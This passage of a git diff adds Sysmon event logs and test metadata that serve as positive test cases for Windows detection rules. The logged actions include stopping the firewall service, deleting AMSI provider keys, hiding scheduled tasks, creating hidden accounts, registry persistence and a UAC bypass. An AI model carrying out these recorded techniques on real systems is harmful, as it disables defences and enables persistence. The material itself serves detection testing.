"http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-22T20:33:27.276702Z" + } + }, + "EventRecordID": 256875, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3168, + "ThreadID": 4580 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-1", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-22 20:33:27.274", + "ProcessGuid": "5AB40FD1-3F97-68F9-5631-000000003B02", + "ProcessId": 3424, + "Image": "C:\\Windows\\System32\\sc.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Service Control Manager Configuration Tool", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "sc.exe", + "CommandLine": "sc stop mpssvc", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\testdata\\", + "User": "AR-WIN-1\\Administrator", + "LogonGuid": "5AB40FD1-8D74-68F7-E44B-100000000000", + "LogonId": "0x104be4", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "MD5=6FB10CD439B40D92935F8F6A0C99670A,SHA256=2BF663EA493CDC21AD33AEBD8DA40CC5D2AFA55E24F9E1BBF3D73E99DCADF693,IMPHASH=803254E010814E69947095A2725B2AFD", + "ParentProcessGuid": "5AB40FD1-3E0C-68F9-1731-000000003B02", + "ParentProcessId": 8252, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\system32\\cmd.exe\"", + "ParentUser": "AR-WIN-1\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml new file mode 100644 index 000000000..fafc9e989 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_sc_stop_service/info.yml @@ -0,0 +1,13 @@ +id: 81ea361b-6e7b-417c-8f70-abd288b10c35 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 81bcb81b-5b1f-474b-b373-52c871aaa7b1 + title: Stop Windows Service Via Sc.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_sc_stop_service/81bcb81b-5b1f-474b-b373-52c871aaa7b1.evtx diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx new file mode 100644 index 000000000..cca37ccdf Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx differ diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json new file mode 100644 index 000000000..a8fe4b5d1 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T00:11:12.880834Z" + } + }, + "EventRecordID": 16786799, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteKey", + "UtcTime": "2025-10-26 00:11:12.865", + "ProcessGuid": "5AA13A44-6720-68FD-3E3F-000000004002", + "ProcessId": 6016, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml new file mode 100644 index 000000000..fafa77339 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/info.yml @@ -0,0 +1,13 @@ +id: 1d4c1ea3-3215-451d-bde8-b64ca8e56041 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 41d1058a-aea7-4952-9293-29eaaf516465 + title: Removal Of AMSI Provider Registry Keys +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key/41d1058a-aea7-4952-9293-29eaaf516465.evtx diff --git a/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx new file mode 100644 index 000000000..dbc7fc03d Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx differ diff --git a/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json new file mode 100644 index 000000000..a4f18136b --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:56:57.832430Z" + } + }, + "EventRecordID": 111828, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteKey", + "UtcTime": "2025-10-24 23:56:57.828", + "ProcessGuid": "5AA13A44-1246-68FC-781E-000000004002", + "ProcessId": 9880, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml new file mode 100644 index 000000000..58b186a13 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_runmru/info.yml @@ -0,0 +1,13 @@ +id: 3c0a5ddd-6241-4b52-9718-b12920e082ef +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55 + title: RunMRU Registry Key Deletion - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_runmru/3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55.evtx diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx new file mode 100644 index 000000000..2908f6152 Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx differ diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json new file mode 100644 index 000000000..fd997938a --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T00:01:59.334619Z" + } + }, + "EventRecordID": 156421, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteValue", + "UtcTime": "2025-10-25 00:01:59.330", + "ProcessGuid": "5AA13A44-1377-68FC-A61E-000000004002", + "ProcessId": 5160, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\Index", + "User": "NT AUTHORITY\\SYSTEM" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml new file mode 100644 index 000000000..f6238bca4 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/info.yml @@ -0,0 +1,13 @@ +id: f3670cef-9f21-4a86-901b-c28c285f3b52 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec + title: Removal Of Index Value to Hide Schedule Task - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal/526cc8bc-1cdc-48ad-8b26-f19bff969cec.evtx diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx new file mode 100644 index 000000000..561d86541 Binary files /dev/null and b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx differ diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json new file mode 100644 index 000000000..e0ee86d51 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 12, + "Version": 2, + "Level": 4, + "Task": 12, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T00:01:54.872810Z" + } + }, + "EventRecordID": 155709, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "DeleteValue", + "UtcTime": "2025-10-25 00:01:54.861", + "ProcessGuid": "5AA13A44-1372-68FC-A51E-000000004002", + "ProcessId": 7008, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\MaliciousTask\\SD", + "User": "NT AUTHORITY\\SYSTEM" + } + } +} diff --git a/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml new file mode 100644 index 000000000..797434d31 --- /dev/null +++ b/regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/info.yml @@ -0,0 +1,13 @@ +id: b796fd1e-a03a-4db8-a072-c597b6e0da1b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: acd74772-5f88-45c7-956b-6a7b36c294d2 + title: Removal Of SD Value to Hide Schedule Task - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal/acd74772-5f88-45c7-956b-6a7b36c294d2.evtx diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx new file mode 100644 index 000000000..d2da07e5e Binary files /dev/null and b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx differ diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json new file mode 100644 index 000000000..4f8bd046f --- /dev/null +++ b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2020-12-18T17:56:07.017817Z" + } + }, + "EventRecordID": 596571, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3552, + "ThreadID": 5004 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "MSEDGEWIN10", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "Hidden Local Account Created", + "EventType": "SetValue", + "UtcTime": "2020-12-18 17:56:07.015", + "ProcessGuid": "747F3D96-68DD-5FDD-0000-00101B660000", + "ProcessId": 648, + "Image": "C:\\Windows\\system32\\lsass.exe", + "TargetObject": "HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)", + "Details": "Binary Data" + } + } +} diff --git a/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml new file mode 100644 index 000000000..b8654b91d --- /dev/null +++ b/regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/info.yml @@ -0,0 +1,13 @@ +id: 1c45847c-0ccb-43f5-aa06-ad97d1553d5a +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: 460479f3-80b7-42da-9c43-2cc1d54dbccd + title: Creation of a Local Hidden User Account by Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_event/registry_event_add_local_hidden_user/460479f3-80b7-42da-9c43-2cc1d54dbccd.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx new file mode 100644 index 000000000..007a96728 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json new file mode 100644 index 000000000..68a480c1f --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:28:03.064387Z" + } + }, + "EventRecordID": 27517409, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:28:03.060", + "ProcessGuid": "5AA13A44-5A23-68FE-2155-000000004002", + "ProcessId": 4400, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\AtomicSafeMode\\(Default)", + "Details": "Service", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml new file mode 100644 index 000000000..3ecfc8225 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/info.yml @@ -0,0 +1,13 @@ +id: 26f40be2-5b94-4e29-9e34-2e8efb43d6f8 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 1547e27c-3974-43e2-a7d7-7f484fb928ec + title: Registry Persistence via Service in Safe Mode +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode/1547e27c-3974-43e2-a7d7-7f484fb928ec.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx new file mode 100644 index 000000000..24ec37863 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json new file mode 100644 index 000000000..89f19962e --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:33:36.133400Z" + } + }, + "EventRecordID": 27619790, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:33:36.131", + "ProcessGuid": "5AA13A44-5B70-68FE-4655-000000004002", + "ProcessId": 8024, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Print\\Monitors\\AtomicRedTeam\\Driver", + "Details": "C:\\AtomicRedTeam\\atomics\\T1547.010\\bin\\PortMonitor.dll", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml new file mode 100644 index 000000000..3cd8781d2 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_add_port_monitor/info.yml @@ -0,0 +1,13 @@ +id: 8f807b19-07e7-4471-b4ff-d961f2e1d71f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 944e8941-f6f6-4ee8-ac05-1c224e923c0e + title: Add Port Monitor Persistence in Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_add_port_monitor/944e8941-f6f6-4ee8-ac05-1c224e923c0e.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx new file mode 100644 index 000000000..764c4cb86 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json new file mode 100644 index 000000000..95a79842e --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:36:04.950926Z" + } + }, + "EventRecordID": 27665830, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:36:04.941", + "ProcessGuid": "5AA13A44-5C04-68FE-5855-000000004002", + "ProcessId": 10080, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\fAllowToGetHelp", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml new file mode 100644 index 000000000..2daa6478e --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/info.yml @@ -0,0 +1,13 @@ +id: a9bcd1ab-6556-4fc3-b9c9-724b335485e4 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 37b437cf-3fc5-4c8e-9c94-1d7c9aff842b + title: Allow RDP Remote Assistance Feature +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_allow_rdp_remote_assistance_feature/37b437cf-3fc5-4c8e-9c94-1d7c9aff842b.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx new file mode 100644 index 000000000..842a80237 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json new file mode 100644 index 000000000..9ac48ad77 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/46dd5308-4572-4d12-aa43-8938f0184d4f.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T17:41:48.911849Z" + } + }, + "EventRecordID": 27772045, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 17:41:48.898", + "ProcessGuid": "5AA13A44-5D5B-68FE-7B55-000000004002", + "ProcessId": 420, + "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\Folder\\shell\\open\\command\\DelegateExecute", + "Details": "(Empty)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml new file mode 100644 index 000000000..1bd84b34b --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml @@ -0,0 +1,13 @@ +id: 